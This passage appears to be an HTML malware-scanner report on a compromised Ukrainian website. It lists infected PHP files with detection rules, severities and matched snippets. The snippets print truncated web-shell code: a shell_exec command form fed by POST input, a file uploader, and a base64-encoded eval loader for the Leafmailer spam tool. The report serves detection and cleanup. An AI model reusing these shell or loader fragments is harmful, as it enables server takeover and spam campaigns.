<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ipas</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">p</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$i</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"- ?? -"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getegid'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silenced_eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@eval(</span><span style="color: #DD0000">"phpinfo()</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">"phpinfo();"</span><span style="color: #007700">); </span><span style="color: #0000BB">$buff </span><span style="color: #007700">= @</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">(); @</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">(); </span><span style="color: #0000BB">$awal </span><span style="color: #007700">= </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$buff</span><span style="color: #007700">,</span><span style="color: #DD0000">"<body>"</span><span style="color: #007700">)+</span><span style="color: #0000BB">6</span><span style="color: #007700">; </span><span style="color: #0000BB">$akhir </span><span style="color: #007700">= </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$buff</span><span style="color: #007700">,</span><span style="color: #DD0000">"</body>"</span><span style="color: #007700">); echo </span><span style="color: #DD0000">"<b><pre class='php_info anu'>"</span><span style="color: #007700">.</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$buff</span><span style="color: #007700">,</span><span style="color: #0000BB">$awal</span><span style="color: #007700">,</span><span style="color: #0000BB">$akhir</span><span style="color: #007700">-</span><span style="color: #0000BB">$awal</span><span style="color: #007700">).</span><span style="color: #DD0000">"</pre></b>"</span><span style="color: #007700">; exit; } if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'upload'</span><span style="color: #007700">])) { echo </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$_s</span><span style="color: #DD0000">"</span><span style="color: #007700">; if(isset(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'upl'</span><span style="color: #007700">])){ </span><span style="color: #0000BB">$hasil </span><span style="color: #007700">= </span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]); for(</span><span style="color: #0000BB">$isi</span><span style="color: #007700">=</span><span style="color: #0000BB">0</span><span style="color: #007700">;</span><span style="color: #0000BB">$isi</span><span style="color: #007700"><</span><span style="color: #0000BB">$hasil</span><span style="color: #007700">;</span><span style="color: #0000BB">$isi</span><span style="color: #007700">++){ </span><span style="color: #0000BB">$namafile </span><span style="color: #007700">= </span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'name'</span><span style="color: #007700">][</span><span style="color: #0000BB">$isi</span><span style="color: #007700">]; </span><span style="color: #0000BB">$up </span><span style="color: #007700">= @</span><span style="color: #0000BB">copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$_FILES</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">][</span><span style="color: #DD0000">'tmp_name'</span><span style="color: #007700">][</span><span style="color: #0000BB">$isi</span><span style="color: #007700">],</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$path</span><span style="color: #DD0000">/"</span><span style="color: #007700">.</span><span style="color: #0000BB">$namafile</span><span style="color: #007700">); } if(</span><span style="color: #0000BB">$hasil </span><span style="color: #007700">< </span><span style="color: #0000BB">2</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">$up</span><span style="color: #007700">)...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">()); </span><span style="color: #0000BB">$gid </span><span style="color: #007700">= @</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_getegid</span><span style="color: #007700">()); </span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">$uid</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]; </span><span style="color: #0000BB">$uid </span><span style="color: #007700">= </span><span style="color: #0000BB">$uid</span><span style="color: #007700">[</span><span style="color: #DD0000">'uid'</span><span style="color: #007700">]; </span><span style="color: #0000BB">$group </span><span style="color: #007700">= </span><span style="color: #0000BB">$gid</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]; </span><span style="color: #0000BB">$gid </span><span style="color: #007700">= </span><span style="color: #0000BB">$gid</span><span style="color: #007700">[</span><span style="color: #DD0000">'gid'</span><span style="color: #007700">]; } </span><span style="color: #0000BB">$sm </span><span style="color: #007700">= (@</span><span style="color: #0000BB">ini_get</span><span style="color: #007700">(</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #DD0000">"safe_mode"</span><span style="color: #007700">)) == </span><span style="color: #DD0000">'on'</span><span style="color: #007700">) ? </span><span style="color: #DD0000">"<rd>ON</rd>" </span><span style="color: #007700">: </span><span style="color: #DD0000">"<gr>OFF</gr>"</span><span style="color: #007700">; echo </span><span style="color: #DD0000">"<br /><!DOCTYPE HTML><br /><html><br /> <head><br /> <meta name='author' content='</span><span style="color: #0000BB">$_n</span><span style="color: #DD0000">'><br /> <meta name='robots' content='noindex,nofollow'><br /> <title>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'HTTP_HOST'</span><span style="color: #007700">].</span><span style="color: #DD0000">" - </span><span style="color: #0000BB">$_n</span><span style="color: #DD0000"></title><br /> <meta name='viewport' content='width=device-width, initial-scale=0.70'><br /> <link...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">].</span><span style="color: #DD0000">' 2>&1'</span><span style="color: #007700">); } echo </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$_s</span><span style="color: #DD0000"><br /><div class='mb-3'><br /> <form method='POST'><br /> <div class='input-group mb-3'><br /> <input class='form-control btn-sm' type='text' name='cmd' value='"</span><span style="color: #007700">.</span><span style="color: #0000BB">htmlspecialchars</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">], </span><span style="color: #0000BB">ENT_QUOTES</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">).</span><span style="color: #DD0000">"' placeholder='whoami' </span><span style="color: #0000BB">$_r</span><span style="color: #DD0000">><br /> <button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button><br /> </div><br /> </form>"</span><span style="color: #007700">; if(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">): echo </span><span style="color: #DD0000">'<br /> <div class="container-fluid language-javascript"><br /> <div class="shell mb-3"><br />...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 156</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_123").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ksxiw.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:44:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:44:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_124" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_124").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/dxqsr.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:53:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:53:28</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_125" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
